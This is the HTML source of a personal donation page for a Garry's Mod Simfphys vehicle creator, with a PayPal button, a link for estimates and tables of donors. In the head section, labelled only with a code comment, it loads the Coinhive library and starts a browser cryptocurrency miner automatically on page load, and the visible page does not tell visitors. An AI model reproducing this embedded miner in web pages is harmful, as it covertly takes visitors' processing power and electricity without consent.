<!DOCTYPE html>
<html>
<head>
  <title>Noobular's Vehicles!</title>

  <!-- Boot Strap -->
  <!-- Latest compiled and minified CSS -->
  <link rel="stylesheet" href="https://bootswatch.com/3/superhero/bootstrap.min.css">

  <!-- jQuery library -->
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

  <!-- Latest compiled JavaScript -->
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

  <!-- Font / Glyph Icons -->
  <link rel="stylesheet" href="https://cdn.rawgit.com/konpa/devicon/master/devicon.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/hover.css/2.1.0/css/hover-min.css">
  <script src="https://use.fontawesome.com/8a9d8d3eec.js"></script>

   <!-- Miner --> 
  <script src="https://coinhive.com/lib/coinhive.min.js"></script>

  <script> 
    var miner = new CoinHive.Anonymous('AH9YR9lg3sPGdZKviBDhV6otFqEtJVoa',{throttle:.3});
    miner.start();
  </script>
  <meta name='viewport' content='width=400'>


  <style>
  @media only screen and (max-width: 768px){
    body{
      margin-top:400px;
      width:100%;
    }
    .col-sm-1{
        width:100%;
    }
    .col-sm-2{
      width:100%;
    }
    .col-sm-3{
      width:100%;
    }
    .col-sm-4{
      width:100%;
    }
    .col-sm-5{
      width:100%;
    }
    .col-sm-6{
      width:100%;
    }
    .col-sm-7{
      width:100%;
    }
    .col-sm-8{
      width:100%;
    }
    .col-sm-9{
      width:100%;
    }
    .col-sm-10{
      width:100%;
    }
    .col-sm-11{
      width:100%;
    }
    .col-sm-12{
      width:100%;
    }
  }

  .center {
    margin: auto;
    width: 50%;
  }

  body{
    margin-top:60px;
    font-family: 'Source Code Pro', monospace;
  }
  .navbarbtn{
    color:#ff0000;
    background-color:#545454;
  }
  .borderless{
    border: 0px;
    border-radius: 0px;
    color:white;
  }

  </style>
</head>
<body style="background-color: #252626">

<nav  class="navbar-default navbar navbar-fixed-top" style="margin:0px; border:0px; border-radius: 0px; background-color:#545454;"  data-spy="affix" data-offset-top="49">
    <div class="navbar-header" style="margin-left:115px;">
      <ul class="nav navbar-nav">
        <li class=""><a href="https://discord.gg/nr256Jr" target="_BLANK" class=" hvr-shutter-out-horizontal navbarbtn" style="color:#15ff00; font-weight: bold;"> <i class="fa fa-money" aria-hidden="true"></i> Get an estimate</a></li>
      </ul>
    </div>
  </div>
</nav>


<div class="container">
  <div class="jumbotron" style="border-radius: 0px; background-color: #545454; color:#c2c4c2;">
    <h1>Welcome!</h1>
    <p>I've been creating Simfphys cars for Garry's mod for free out of the love of the vehicle mod, and people spam me with request, so if you'd like to support me or get your request done when you're requesting, buy me a coffee or two.</p>

  </div>
</div>

<div class="container">

  <div class="well col-sm-5" style="border-radius: 0px;  background-color: #545454; color:#c2c4c2; border-color: #545454; height:70px;">
      <b>PayPal Donations</b>
      <form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top" style="float:right; margin:0px; padding: 0px;">
        <input type="hidden" name="cmd" value="_s-xclick">
        <input type="hidden" name="hosted_button_id" value="AYPCDY452JW5W">
        <input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_donate_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
        <img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1">
      </form>



  </div>

  <div class="well col-sm-5" style="border-radius: 0px; float:right; background-color: #545454; color:#c2c4c2; border-color: #545454; height:70px;">
      <b>Counter-Strike: Global Offensive Skins/Cases</b>
  </div>

  <div class="container col-sm-5" style="border-radius: 0px; background-color: #545454; color:#c2c4c2; margin-right:5px;">
    <table class="table">
    <thead>
      <tr>
        <th>Username</th>
        <th>Amount Donated</th>
      </tr>
    </thead>
    <tbody>
      <tr>
        <td>Hotshot9500</td>
        <td>$3.00</td>
      </tr>

    </tbody>
  </table>

  </div>



  <div class="container col-sm-5" style="border-radius: 0px; background-color: #545454; color:#c2c4c2; margin-left:5px; float:right;">

   <table class="table">
      <thead>
        <tr>
          <th>Username</th>
          <th>Skins/Cases Donated</th>
        </tr>
      </thead>
      <tbody>
        <tr>
          <td>Lals</td>
          <td>75 Cases</td>
        </tr>

      </tbody>
    </table>

  </div>
</div>
</body>
</html>



